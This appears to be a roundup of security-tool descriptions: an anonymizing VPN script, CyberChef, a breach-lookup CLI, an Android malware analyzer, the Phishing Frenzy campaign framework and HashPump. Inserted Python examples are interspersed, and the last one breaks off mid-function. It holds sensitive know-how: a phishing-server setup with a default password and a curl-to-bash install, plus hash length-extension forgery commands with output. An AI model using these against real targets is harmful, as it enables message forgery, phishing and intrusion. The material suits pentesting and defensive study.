4nonimizer – A Bash Script For Anonymizing The Public IP Used To Browse The Internet

4nonimizer is a bash script for anonymizing the public IP used to browse the Internet. It manages the connection to the TOR network and to different VPN providers (OpenVPN), whether free or paid. By default, it includes several pre-configured VPN connections to different peers (.ovpn files) and downloads the credentials (if the corresponding provider supports it). It also records the IP in use every 300 seconds in log files.

This script is enabled as a service in systemd systems and uses a default vpn (VPNBook) at system startup.

Since version 1.06, DNS resolution requests are done through DnsCrypt (enable and disable it with the option enable_dns or disable_dns).

Since version 1.12, the VPN connection logs are saved in SQLite under /logs/.


4nonimizer Installation

Download the repo using git, execute the command ./4nonimizer install in the directory, and follow the on-screen instructions. 4nonimizer will move itself to the directory /opt/ and be installed as a service.

This script is fully compatible with Kali Linux; it has also been tested on, and should work on, other distributions like Debian, Ubuntu and Arch (Manjaro). However, there could be some bugs or unexpected behaviour (please comment if you find any!).

Options

Once 4nonimizer is installed, enter the command 4nonimizer help to display the help, which lists all the available parameters:

       ___                   _           _
      /   |                 (_)         (_)
     / /| |_ __   ___  _ __  _ _ __ ___  _ _______ _ __
    / /_| | '_ \ / _ \| '_ \| | '_  ` _ | |_  / _ \ '__|
    \___  | | | | (_) | | | | | | | | | | |/ /  __/ |
        |_/_| |_|\___/|_| |_|_|_| |_| |_|_/___\___|_|
                                       By Carlos Antonini & Vicente Motos
                                       Version: 1.06-beta

Usage: 4nonymizer <parameter>
install: Install the script in run services
uninstall: Disable run service and remove app directory
change_provider: Change VPN Provider
change_ip: Change IP from VPN current
vpn_status: Check IP and provider VPN running
update_vpns: Update all ovpn of VPNs
start: Init the 4nonimizer service
stop: Stop the 4nonimizer service
stop_nonet: Stop the 4nonimizer service and shutdown network interfaces
restart: Restart the 4nonimizer service
update_app: Update this program via git
privoxy: Install and configure privoxy with port 8118 (BETA)
proxychains4: Install and configure proxychains4 for default in the system
browser: Fire up a firefox browser with profile privoxy -> tor
test_availability: Check peers availability and delete ovpn file if the IP/service is unreachable
location: Now you can select a specific country or continent of the vpn peer
enableboot: You can enable service in boot
disableboot: You can disable service in boot
enable_dnscrypt: Enable dnscrypt service
disable_dnscrypt: Disable dnscrypt service

help: Help (this screen)

Available VPNs

Currently it supports the following VPN providers:

Install A New VPN

To install an additional VPN, we have to use the following structure so that 4nonimizer is able to integrate it and perform operations with it.

First, we have to create the following directory structure, /vpn/, within the 4nonimizer path:

In our example we create the folder /vpntest/ and place in it all the .ovpn files we have. If the .ovpn files do not embed the certificate, we put it in the same folder, as shown in the example with certificate.crt.

In addition, we must place a file named pass.txt containing two lines: the first with the username and the second with the password, as shown below:

If we have performed all the steps correctly, when we execute the command 4nonimizer change_provider the menu will show our VPN:

As you can see in the picture, option [7] is the VPN we've created.

Getting Credentials & ovpn Files Automatically

If the VPN provider allows automating the retrieval of credentials and/or .ovpn files, 4nonimizer has standardized the following script names and locations:

– /opt/4nonimizer/vpn/provider/vpn-get-pass.sh

– /opt/4nonimizer/vpn/provider/vpn-get-ovpn.sh

4nonimizer automatically detects the presence of both scripts and indicates (Auto-pass Login) or (Auto-get OVPN) if it finds the expression '#4uto' or '#m4nual' in the first line of each file, depending on the action the script performs.
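The provider layout above (a vpn/<provider>/ folder with .ovpn peers, an optional certificate, a two-line pass.txt and the optional vpn-get-pass.sh / vpn-get-ovpn.sh helpers) is easy to get slightly wrong. The following checker is an added example, not part of 4nonimizer; it assumes a '#4uto' first line marks automatic retrieval and '#m4nual' a helper that still needs manual steps, and the sample provider it builds is constructed data.

```python
import os
import tempfile

MARKERS = ("#4uto", "#m4nual")  # first-line tags 4nonimizer looks for in the helper scripts


def _first_line(path):
    try:
        with open(path, encoding="utf-8", errors="replace") as f:
            return f.readline().strip()
    except OSError:
        return None  # helper script not present


def inspect_provider(provider_dir):
    """Check one vpn/<provider>/ folder against the layout described above."""
    names = set(os.listdir(provider_dir))
    report = {
        "ovpn_files": sorted(n for n in names if n.endswith(".ovpn")),
        "certificate": sorted(n for n in names if n.endswith(".crt")),
        "problems": [],
    }
    if not report["ovpn_files"]:
        report["problems"].append("no .ovpn peer files found")

    # pass.txt: exactly two non-empty lines, username then password
    if "pass.txt" in names:
        with open(os.path.join(provider_dir, "pass.txt"), encoding="utf-8", errors="replace") as f:
            lines = [line.rstrip("\r\n") for line in f]
        if len(lines) != 2 or not all(lines):
            report["problems"].append("pass.txt must contain exactly two non-empty lines (username, password)")

    # helper scripts: assumption, '#4uto' => 4nonimizer shows the Auto-* label, '#m4nual' => manual
    for script, label in (("vpn-get-pass.sh", "Auto-pass Login"), ("vpn-get-ovpn.sh", "Auto-get OVPN")):
        first = _first_line(os.path.join(provider_dir, script))
        report[label] = first == "#4uto"
        if first is not None and first not in MARKERS:
            report["problems"].append(f"{script}: first line must be #4uto or #m4nual, found {first!r}")

    if "pass.txt" not in names and not report["Auto-pass Login"]:
        report["problems"].append("no pass.txt and no automatic vpn-get-pass.sh: nothing to log in with")
    return report


def demo():
    """Build a constructed vpntest/ provider plus a broken one in a temp dir and inspect both."""
    root = tempfile.mkdtemp(prefix="4non-")
    good = os.path.join(root, "vpn", "vpntest")
    os.makedirs(good)
    for peer in ("de1.ovpn", "us2.ovpn"):
        with open(os.path.join(good, peer), "w") as f:
            f.write("client\nremote example.invalid 1194\n")  # constructed stub, not a real peer
    with open(os.path.join(good, "certificate.crt"), "w") as f:
        f.write("-----BEGIN CERTIFICATE-----\nconstructed\n-----END CERTIFICATE-----\n")
    with open(os.path.join(good, "pass.txt"), "w") as f:
        f.write("vpnuser\nvpnpass\n")
    with open(os.path.join(good, "vpn-get-ovpn.sh"), "w") as f:
        f.write("#4uto\necho 'fetch peers here'\n")

    bad = os.path.join(root, "vpn", "broken")
    os.makedirs(bad)
    with open(os.path.join(bad, "pass.txt"), "w") as f:
        f.write("onlyusername\n")  # missing password line, and no .ovpn peers at all
    return inspect_provider(good), inspect_provider(bad)
```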

Additional

– Execute ‘source 4nonimizer’ to activate autocompletion of parameters.
– Copy .conkyrc in your home directory to load a 4nonimizer template and execute conky.

CyberChef – A web App For Encryption, Encoding, Compression & Data Analysis

CyberChef is a simple, intuitive web app for carrying out all manner of “cyber” operations within a web browser. These operations include simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years.


How it works

There are four main areas in CyberChef:

  1. The input box in the top right, where you can paste, type or drag the text or file you want to operate on.
  2. The output box in the bottom right, where the outcome of your processing will be displayed.
  3. The operations list on the far left, where you can find all the operations that CyberChef is capable of in categorised lists, or by searching.
  4. The recipe area in the middle, where you can drag the operations that you want to use and specify arguments and options.

CyberChef Features

  • Drag and drop
    • Operations can be dragged in and out of the recipe list, or reorganised.
    • Files up to 500MB can be dragged over the input box to load them directly into the browser.
  • Auto Bake
    • Whenever you modify the input or the recipe, CyberChef will automatically “bake” for you and produce the output immediately.
    • This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
  • Automated encoding detection
    • CyberChef uses a number of techniques to attempt to automatically detect which encodings your data is under. If it finds a suitable operation which can make sense of your data, it displays the ‘magic’ icon in the Output field which you can click to decode your data.
  • Breakpoints
    • You can set breakpoints on any operation in your recipe to pause execution before running it.
    • You can also step through the recipe one operation at a time to see what the data looks like at each stage.
  • Save and load recipes
    • If you come up with an awesome recipe that you know you’ll want to use again, just click “Save recipe” and add it to your local storage. It’ll be waiting for you next time you visit CyberChef.
    • You can also copy the URL, which includes your recipe and input, to easily share it with others.
  • Search
    • If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
  • Highlighting
    • When you highlight text in the input or output, the offset and length values will be displayed and, if possible, the corresponding data will be highlighted in the output or input respectively.
  • Save to file and load from file
    • You can save the output to a file at any time or load a file by dragging and dropping it into the input field. Files up to around 500MB are supported (depending on your browser), however some operations may take a very long time to run over this much data.
  • CyberChef is entirely client-side
    • It should be noted that none of your recipe configuration or input (either text or files) is ever sent to the CyberChef web server – all processing is carried out within your browser, on your own computer.
    • Due to this feature, CyberChef can be compiled into a single HTML file. You can download this file and drop it into a virtual machine, share it with other people, or use it independently on your local machine.

Browser support

CyberChef is built to support

  • Google Chrome 40+
  • Mozilla Firefox 35+
  • Microsoft Edge 14+

Live demo

CyberChef is still under active development. As a result, it shouldn’t be considered a finished product. There is still testing and bug fixing to do, new features to be added and additional documentation to write. Please contribute!

Cryptographic operations in CyberChef should not be relied upon to provide security in any situation. No guarantee is offered for their correctness.

A live demo can be found here – have fun!

Pwned – A Command-Line Tool For Querying The ‘Have I been Pwned?’ Service

A command-line tool for querying Troy Hunt’s Have I been pwned? service using the hibp Node.js module.

Pwned Installation

Download and install Node.js, then install pwned globally using npm:

npm install pwned -g

Alternatively, you can run it on-demand using the npx package runner:

npx pwned

How To Use?

pwned <command>

Commands:
  pwned ba <account|email>      get all breaches for an account (username or email address)
  pwned breach <name>           get a single breached site by breach name
  pwned breaches                get all breaches in the system
  pwned dc                      get all data classes in the system
  pwned pa <email>              get all pastes for an account (email address)
  pwned pw <password>           securely check a password for public exposure
  pwned search <account|email>  search breaches and pastes for an account (username or email
                                address)

Options:
  -h, --help     Show help                                                                 [boolean]
  -v, --version  Show version number                                                       [boolean]


Examples

Get all breaches for an account:

$ pwned ba pleasebeclean@fingerscrossed.tld
✔ Good news — no pwnage found!

Get all breaches in the system, filtering results to just the ‘adobe.com’ domain:

$ pwned breaches -d adobe.com
-
  Title:        Adobe
  Name:         Adobe
  Domain:       adobe.com
  BreachDate:   2013-10-04
  AddedDate:    2013-12-04T00:00:00Z
  ModifiedDate: 2013-12-04T00:00:00Z
  PwnCount:     152445165
  Description:  In October 2013, 153 million Adobe accounts were breached with each containing an internal ID, username, email, <em>encrypted</em> password and a password hint in plain text. The password cryptography was poorly done and <a href="http://stricture-group.com/files/adobe-top100.txt" target="_blank" rel="noopener">many were quickly resolved back to plain text</a>. The unencrypted hints also <a href="http://www.troyhunt.com/2013/11/adobe-credentials-and-serious.html" target="_blank" rel="noopener">disclosed much about the passwords</a> adding further to the risk that hundreds of millions of Adobe customers already faced.
  DataClasses:
    - Email addresses
    - Password hints
    - Passwords
    - Usernames
  IsVerified:   true
  IsFabricated: false
  IsSensitive:  false
  IsActive:     true
  IsRetired:    false
  IsSpamList:   false
  LogoType:     svg

Get a single breached site by breach name:

$ pwned breach MyCompany
✔ No breach found by that name.

Get all the data classes in the system, returning raw JSON results for external/chained consumption:

$ pwned dc --raw
["Account balances","Address book contacts","Age groups","Ages","Apps installed on devices","Astrological signs","Auth tokens","Avatars","Bank account numbers","Banking PINs","Beauty ratings","Biometric data","Browser user agent details","Buying preferences","Car ownership statuses","Career levels","Cellular network names","Charitable donations","Chat logs","Credit card CVV","Credit cards","Credit status information","Customer feedback","Customer interactions","Dates of birth","Deceased date","Deceased statuses","Device information","Device usage tracking data","Drinking habits","Drug habits","Eating habits","Education levels","Email addresses","Email messages","Employers","Ethnicities","Family members' names","Family plans","Family structure","Financial investments","Financial transactions","Fitness levels","Genders","Geographic locations","Government issued IDs","Health insurance information","Historical passwords","Home ownership statuses","Homepage URLs","IMEI numbers","IMSI numbers","Income levels","Instant messenger identities","IP addresses","Job titles","MAC addresses","Marital statuses","Names","Nationalities","Net worths","Nicknames","Occupations","Parenting plans","Partial credit card data","Passport numbers","Password hints","Passwords","Payment histories","Payment methods","Personal descriptions","Personal health data","Personal interests","Phone numbers","Physical addresses","Physical attributes","Political donations","Political views","Private messages","Professional skills","Profile photos","Purchases","Purchasing habits","Races","Recovery email addresses","Relationship statuses","Religions","Reward program balances","Salutations","School grades (class levels)","Security questions and answers","Sexual fetishes","Sexual orientations","Smoking habits","SMS messages","Social connections","Social media profiles","Spoken languages","Support tickets","Survey results","Time zones","Travel habits","User statuses","User website URLs","Usernames","Utility bills","Vehicle details","Website activity","Work habits","Years of birth","Years of professional experience"]

Get all pastes for an email address:

$ pwned pa nobody@nowhere.com
-
  Source:     Pastebin
  Id:         YrpQA60S
  Title:      null
  Date:       2018-01-24T07:54:15Z
  EmailCount: 16476
-
  Source:     Pastebin
  Id:         suPshHZ1
  Title:      null
  Date:       2017-09-06T03:41:33Z
  EmailCount: 20444
-
  Source:     Pastebin
  Id:         xyb8vavK
  Title:      null
  Date:       2015-06-01T00:16:46Z
  EmailCount: 8
-
  Source:     Pastebin
  Id:         DaaFj8Be
  Title:      CrackingCore - Redder04
  Date:       2015-04-05T22:22:39Z
  EmailCount: 116
-
  Source:     Pastebin
  Id:         9MAAgecd
  Title:      IPTV Yabancı Combolist
  Date:       2015-02-07T15:21:00Z
  EmailCount: 244
-
  Source:     Pastebin
  Id:         QMx1dPUT
  Title:      null
  Date:       2015-02-02T20:45:00Z
  EmailCount: 6607
-
  Source:     Pastebin
  Id:         zUFSee4n
  Title:      nethingoez
  Date:       2015-01-21T15:13:00Z
  EmailCount: 312
-
  Source:     AdHocUrl
  Id:         http://siph0n.in/exploits.php?id=4560
  Title:      BuzzMachines.com 40k+
  Date:       null
  EmailCount: 36959
-
  Source:     AdHocUrl
  Id:         http://siph0n.in/exploits.php?id=4737
  Title:      PayPalSucks Database 102k
  Date:       null
  EmailCount: 82071
-
  Source:     AdHocUrl
  Id:         http://balockae.online/files/BlackMarketReloaded_users.sql
  Title:      balockae.online
  Date:       null
  EmailCount: 10547

Securely check a password to see if it has been exposed in a data breach:

$ pwned pw Password1234
⚠ Oh no — pwned 3360 times!
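What makes `pwned pw` a "secure" check is that the hibp module queries the Pwned Passwords range API: only the first five hex characters of the password's SHA-1 are sent, the server returns every suffix in that range with its count, and the match is made locally (k-anonymity). The code below is an added illustration of that exchange, not the tool's code; the range response and counts are constructed, and `offline_range` stands in for the HTTP call.

```python
import hashlib


def sha1_upper(password):
    """Pwned Passwords keys on the upper-case hex SHA-1 of the password."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_hash(hex_digest):
    """Only the 5-char prefix leaves the machine; the 35-char suffix is matched locally."""
    return hex_digest[:5], hex_digest[5:]


def parse_range(text):
    """Parse a range response: one 'SUFFIX:COUNT' per line; malformed lines are ignored, not trusted."""
    counts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        if len(suffix) != 35 or not count.isdigit():
            continue
        counts[suffix.upper()] = int(count)
    return counts


def pwned_count(password, fetch_range):
    """Return how often the password appears in breach data, 0 if never; fetch_range(prefix) -> text."""
    prefix, suffix = split_hash(sha1_upper(password))
    return parse_range(fetch_range(prefix)).get(suffix, 0)


# Constructed stand-in for the API. Real responses hold hundreds of suffixes per prefix; the
# counts here are made up. The second suffix really is the tail of SHA-1('password').
CONSTRUCTED_RANGES = {
    "5BAA6": "\n".join([
        "0018A45C4D1DEF81644B54AB7F969B88D65:1",
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3730471",
        "2F5B7A7C16E1C3A8B1D0E9F7A6C5B4D3E21:17",
    ])
}


def offline_range(prefix):
    """Offline replacement for GET https://api.pwnedpasswords.com/range/<prefix>."""
    return CONSTRUCTED_RANGES.get(prefix, "")
```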

Search both breaches and pastes for an account (truncating breach data):

$ pwned search nobody -t
breaches:
  -
    Name: BattlefieldHeroes
  -
    Name: CannabisForum
  -
    Name: Forbes
  -
    Name: Gawker
  -
    Name: HackForums
  -
    Name: LoungeBoard
  -
    Name: PokemonCreed
  -
    Name: Win7Vista
pastes:   null

Droidefense – Advance Android Malware Analysis Framework

Droidefense (originally named atom: analysis through observation machine) is the codename for an Android app/malware analysis and reversing tool. It was built around the security issues and tricks that malware researchers face in their everyday work. In situations where the malware has anti-analysis routines, Droidefense attempts to bypass them in order to reach the code and the ‘bad boy’ routine. Such techniques include virtual machine detection, emulator detection, self-certificate checking, pipe detection, tracer pid checks, and so on.

Droidefense uses an innovative approach in which the code is observed rather than decompiled. This gives us a global view of the execution workflow of the code with 100% accuracy on the gathered information. From this, Droidefense generates a fancy HTML report with the results for easy understanding.


Droidefense Features

  • .apk unpacker
  • .apk resource decoder
  • .apk file enumeration
  • .apk file classification and identification
  • binary xml decoder
  • in-memory processing using a virtual filesystem
  • resource fuzzing and hashing
  • entropy calculator
  • native code dump
  • certificate analysis
  • debug certificate detection
  • opcode analysis
  • unused opcode detection
  • androidManifest.xml analysis
  • internal structure analysis
  • dalvik bytecode flow analysis
  • multipath analysis implementation (not tested)
  • CFG generation
  • simple reflection resolver
  • String classification
  • simulated workflow generation
  • dynamic rules engine

Droidefense modules

  • PSCout data module
  • Full Android manifest parser, based on official SDK documentation v23.
  • Plugins
  • Machine Learning (Weka based) module

Droidefense plugins

  • Hidden ELF file detector plugin
  • Hidden APK file detector plugin
  • Application UID detector plugin
  • Privacy plugin

Usage

java -jar droidefense-cli-1.0-SNAPSHOT.jar -i /path/to/your/sample.apk

Detailed usage

java -jar droidefense-cli-1.0-SNAPSHOT.jar

________               .__    .___      _____                            
\______ \_______  ____ |__| __| _/_____/ ____\____   ____   ______ ____  
 |    |  \_  __ \/  _ \|  |/ __ |/ __ \   __\/ __ \ /    \ /  ___// __ \ 
 |    `   \  | \(  <_> )  / /_/ \  ___/|  | \  ___/|   |  \\___ \\  ___/ 
/_______  /__|   \____/|__\____ |\___  >__|  \___  >___|  /____  >\___  >
        \/                     \/    \/          \/     \/     \/     \/ 

* Current build: 			2018_03_09__09_17_34
* Check out on Github: 			https://github.com/droidefense/
* Report your issue: 			https://github.com/droidefense/engine/issues
* Lead developer: 			@zerjioang

usage: droidefense
 -d,--debug                 print debugging information
 -h,--help                  print this message
 -i,--input <apk>           input .apk to be analyzed
 -o,--output <format>       select prefered output:
                            json
                            json.min
                            html
 -p,--profile               Wait for JVM profiler
 -s,--show                  show generated report after scan
 -u,--unpacker <unpacker>   select prefered unpacker:
                            zip
                            memapktool
 -v,--verbose               be verbose
 -V,--version               show current version information
 

License

All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

  • Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
  • Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
  • Uses GPL license described below

Phishing Frenzy – Ruby on Rails Phishing Framework

Phishing Frenzy is an Open Source Ruby on Rails application that is leveraged by penetration testers to manage email phishing campaigns.

The goal of the project is to streamline the phishing process while still providing clients the best realistic phishing campaign possible.


Installing Phishing Frenzy on Kali Linux

Clone Repo

Clone the Phishing Frenzy repository using git

# git clone https://github.com/pentestgeek/phishing-frenzy.git /var/www/phishing-frenzy

Install RVM, Ruby and Packages

$ \curl -sSL https://get.rvm.io | bash

At the end of the installation, read any post-install instructions for RVM.

Install Ruby 2.1 with RVM

$ rvm install 2.1.5

Install rails

# rvm all do gem install --no-rdoc --no-ri rails

Install mod_passenger for Apache

# rvm all do gem install --no-rdoc --no-ri passenger

Install Passenger

Invoke the passenger installation script

# passenger-install-apache2-module

The installer stated that I was missing a few Apache dependencies

# apt-get install apache2-threaded-dev libapr1-dev libaprutil1-dev libcurl4-openssl-dev

Invoke the Passenger installation script again now that the dependencies are installed. Once the Passenger install has completed, pay attention to the notes at the end. You will need to add 3 lines of text to your /etc/apache2/apache.conf file.

# passenger-install-apache2-module

Install packages we need for MySQL to bundle properly

# apt-get install libmysqlclient-dev

Apache VHOST Configuration

Add an Include statement to apache2.conf and create the file /etc/apache2/pf.conf

Include pf.conf

Add content to pf.conf file

<IfModule mod_passenger.c>
PassengerRoot %ROOT
PassengerRuby %RUBY
</IfModule>

<VirtualHost *:80>
ServerName phishing-frenzy.com
# !!! Be sure to point DocumentRoot to 'public'!
DocumentRoot /var/www/phishing-frenzy/public
RailsEnv development
<Directory /var/www/phishing-frenzy/public>
# This relaxes Apache security settings.
AllowOverride all
# MultiViews must be turned off.
Options -MultiViews
</Directory>
</VirtualHost>

Uncomment the line # NameVirtualHost *:443 inside /etc/apache2/ports.conf to allow SSL phishing sites to render properly.

MySQL

Ensure mysql is running

# service mysql start

Log in and create the database and permissions for Phishing Frenzy development mode

# mysql -u root -p
mysql> create database pf_dev;
mysql> grant all privileges on pf_dev.* to 'pf_dev'@'localhost' identified by 'password';

Install Required Gems

# cd /var/www/phishing-frenzy/

# bundle install

If your web application fails to run because it states you're missing a gem, you may need to run

# bundle install --deployment

# rake db:migrate

# rake db:seed

Install Redis

# wget http://download.redis.io/releases/redis-stable.tar.gz

# tar xzf redis-stable.tar.gz

# cd redis-x.x.x/

# make

# make install

# cd utils/

# ./install_server.sh

If you would like to bind Redis to the loopback interface, check out the Redis documentation for more details.

Sidekiq Configuration

Create a tmp directory for sidekiq pid

# mkdir -p /var/www/phishing-frenzy/tmp/pids

Start the sidekiq server to interact with redis

# bundle exec sidekiq -C config/sidekiq.yml

System Configuration

Edit the sudoers file to ensure the www-data account can reload Apache

www-data ALL=(ALL) NOPASSWD: /etc/init.d/apache2 reload

Load the Efax and Intel default templates for PF using the rake helper

# rake templates:load

Change ownership of phishing-frenzy directory so apache has proper access

# chown -R www-data:www-data /var/www/phishing-frenzy/

Change permissions on the upload directory

# chmod -R 755 /var/www/phishing-frenzy/public/uploads/

Change ownership of sites-enabled directory to allow Phishing Frenzy to manage virtual hosts with Apache

# chown -R www-data:www-data /etc/apache2/sites-enabled/
# chmod -R 755 /etc/apache2/sites-enabled/

Start Apache web server

# apachectl start

Phishing Frenzy is configured with a default login of:

username: admin
password: Funt1me!

Configure HTTPS / SSL

If you would like to run your Phishing Frenzy web UI over HTTPS you can do that with a few additional changes.

Run a few commands to enable the SSL module in Apache and create a directory to store the cert and key.

$ sudo a2enmod ssl

$ sudo service apache2 restart

$ sudo mkdir /etc/apache2/ssl

Create our self-signed cert using openssl

$ sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/ssl/pf.key -out /etc/apache2/ssl/pf.crt

<IfModule mod_passenger.c>
PassengerRoot %ROOT
PassengerRuby %RUBY
</IfModule>

<VirtualHost *:443>
ServerName phishing-frenzy.com

SSLEngine on
SSLCertificateFile /etc/apache2/ssl/pf.crt
SSLCertificateKeyFile /etc/apache2/ssl/pf.key

# !!! Be sure to point DocumentRoot to 'public'!
DocumentRoot /var/www/phishing-frenzy/public
RailsEnv development
<Directory /var/www/phishing-frenzy/public>
# This relaxes Apache security settings.
AllowOverride all
# MultiViews must be turned off.
Options -MultiViews
</Directory>
</VirtualHost>

Update the Application Site URL in the Global Settings menu to the appropriate FQDN, using the HTTPS address now that SSL is enabled.
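The steps above touch several files whose exact content matters (the Include line, a DocumentRoot ending in public/, a sudoers entry that grants www-data only the Apache reload, the sidekiq pid directory, 755 on uploads/ and a private key readable by root alone). This post-install checker is an added example, not part of Phishing Frenzy; it takes a root prefix so it can be run against a staged tree, and `demo()` builds constructed hardened and weak trees in a temp directory.

```python
import os
import stat
import tempfile

APP = "var/www/phishing-frenzy"
SUDO_LINE = "www-data ALL=(ALL) NOPASSWD: /etc/init.d/apache2 reload"


def _read(path):
    try:
        with open(path, encoding="utf-8", errors="replace") as f:
            return f.read()
    except OSError:
        return ""


def check_install(root="/"):
    """Return a list of findings for the layout described above; an empty list means all checks passed."""
    p = lambda *parts: os.path.join(root, *parts)
    app = p(APP)
    findings = []

    if "Include pf.conf" not in _read(p("etc/apache2/apache2.conf")).splitlines():
        findings.append("apache2.conf: 'Include pf.conf' line missing")
    if f"DocumentRoot {app}/public" not in _read(p("etc/apache2/pf.conf")):
        findings.append("pf.conf: DocumentRoot must point at .../phishing-frenzy/public")

    # www-data may reload Apache and nothing more; a broader entry is a root escalation path
    www = [l for l in _read(p("etc/sudoers")).splitlines() if l.startswith("www-data")]
    if not www:
        findings.append("sudoers: no www-data entry, Phishing Frenzy cannot reload Apache")
    elif www != [SUDO_LINE]:
        findings.append("sudoers: www-data entry is broader than 'apache2 reload'")

    if not os.path.isdir(p(APP, "tmp/pids")):
        findings.append("tmp/pids missing (sidekiq pid directory)")

    uploads = p(APP, "public/uploads")
    if os.path.isdir(uploads) and os.stat(uploads).st_mode & stat.S_IWOTH:
        findings.append("public/uploads is world-writable; the guide uses chmod -R 755")

    key = p("etc/apache2/ssl/pf.key")
    if os.path.isfile(key) and os.stat(key).st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append("ssl/pf.key is readable by group/other; chmod 600 it")
    return findings


def stage(root, hardened=True):
    """Write a constructed install tree under root mirroring the steps above (fixture, not real data)."""
    app = os.path.join(root, APP)
    for d in ("etc/apache2/ssl", f"{APP}/public/uploads", f"{APP}/tmp/pids"):
        os.makedirs(os.path.join(root, d), exist_ok=True)
    with open(os.path.join(root, "etc/apache2/apache2.conf"), "w") as f:
        f.write("Include pf.conf\n")
    with open(os.path.join(root, "etc/apache2/pf.conf"), "w") as f:
        f.write(f"<VirtualHost *:80>\nDocumentRoot {app}/public\n</VirtualHost>\n")
    with open(os.path.join(root, "etc/sudoers"), "w") as f:
        f.write((SUDO_LINE if hardened else "www-data ALL=(ALL) NOPASSWD: ALL") + "\n")
    key = os.path.join(root, "etc/apache2/ssl/pf.key")
    open(key, "w").close()
    os.chmod(key, 0o600 if hardened else 0o644)
    os.chmod(os.path.join(app, "public/uploads"), 0o755 if hardened else 0o777)


def demo():
    """Check a hardened and a weakened staged tree; returns {'hardened': [...], 'weak': [...]}."""
    results = {}
    for name, hardened in (("hardened", True), ("weak", False)):
        root = tempfile.mkdtemp(prefix="pf-check-")
        stage(root, hardened)
        results[name] = check_install(root)
    return results
```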

Credit: Brandon zeknox McCann

HashPump – Tool To Exploit Hash Length Extension Attack In Various Hashing Algorithms

HashPump is a tool to exploit the hash length extension attack in various hashing algorithms. Currently supported algorithms: MD5, SHA1, SHA256, SHA512.

Menu

$ hashpump -h
HashPump [-h help] [-t test] [-s signature] [-d data] [-a additional] [-k keylength]
    HashPump generates strings to exploit signatures vulnerable to the Hash Length Extension Attack.
    -h --help          Display this message.
    -t --test          Run tests to verify each algorithm is operating properly.
    -s --signature     The signature from known message.
    -d --data          The data from the known message.
    -a --additional    The information you would like to add to the known message.
    -k --keylength     The length in bytes of the key being used to sign the original message with.
    Version 1.2.0 with CRC32, MD5, SHA1, SHA256 and SHA512 support.
    <Developed by bwall(@botnet_hunter)>


Sample Output

$ hashpump -s '6d5f807e23db210bc254a28be2d6759a0f5f5d99' --data 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo' -a '&waffle=liege' -k 14
0e41270260895979317fff3898ab85668953aaa2
count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

HashPump Installation

$ git clone https://github.com/bwall/HashPump.git
$ apt-get install g++ libssl-dev
$ cd HashPump
$ make
$ make install

apt-get and make install require root privileges to run correctly. The actual requirement is for -lcrypto, so depending on your operating system, your dependencies may vary.

On OS X HashPump can also be installed using Homebrew:

$ brew install hashpump

Python Bindings

Fellow Python lovers will be pleased with this addition. Saving me from writing an implementation of all these hash algorithms with the ability to modify states in Python, Python bindings have been added in the form of hashpumpy.

Installation

These Python bindings are available on PyPI and can be installed via pip:

pip install hashpumpy

Usage

>>> import hashpumpy
>>> help(hashpumpy.hashpump)
Help on built-in function hashpump in module hashpumpy:

hashpump(...)
    hashpump(hexdigest, original_data, data_to_add, key_length) -> (digest, message)

    Arguments:
        hexdigest(str):      Hex-encoded result of hashing key + original_data.
        original_data(str):  Known data used to get the hash result hexdigest.
        data_to_add(str):    Data to append
        key_length(int):     Length of unknown data prepended to the hash

    Returns:
        A tuple containing the new hex digest and the new message.
>>> hashpumpy.hashpump('ffffffff', 'original_data', 'data_to_add', len('KEYKEYKEY'))
('e3c4a05f', 'original_datadata_to_add')

Python 3 note

hashpumpy supports Python 3. Different from the Python 2 version, the second value (the new message) in the returned tuple from hashpumpy.hashpump is a bytes-like object instead of a string.
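The attack HashPump automates, and the reason it works, is easier to see with the verifier side next to it: for SHA-1 (and the other Merkle-Damgård hashes listed), the digest of key||data is the hash's internal state, so anyone holding the digest can resume hashing without the key. The block below is an added example, not HashPump or hashpumpy code; it reimplements SHA-1 with a resumable state, offers `length_extend` with the same contract as `hashpumpy.hashpump`, and contrasts a vulnerable `sha1(key || message)` check with an HMAC check that rejects the forgery. The 14-byte key in `demo()` is constructed.

```python
import hashlib
import hmac
import struct

_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)
_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def _compress(state, block):
    """One SHA-1 compression over a 64-byte block (FIPS 180-4)."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = (_rotl(a, 5) + f + e + k + w[i]) & _MASK, a, _rotl(b, 30), c, d
    return tuple((s + v) & _MASK for s, v in zip(state, (a, b, c, d, e)))


def md_padding(total_len):
    """The bytes SHA-1 appends to a total_len-byte message: 0x80, zeros, then the 64-bit bit length."""
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack(">Q", total_len * 8)


def sha1_hex(data, state=_IV, already_absorbed=0):
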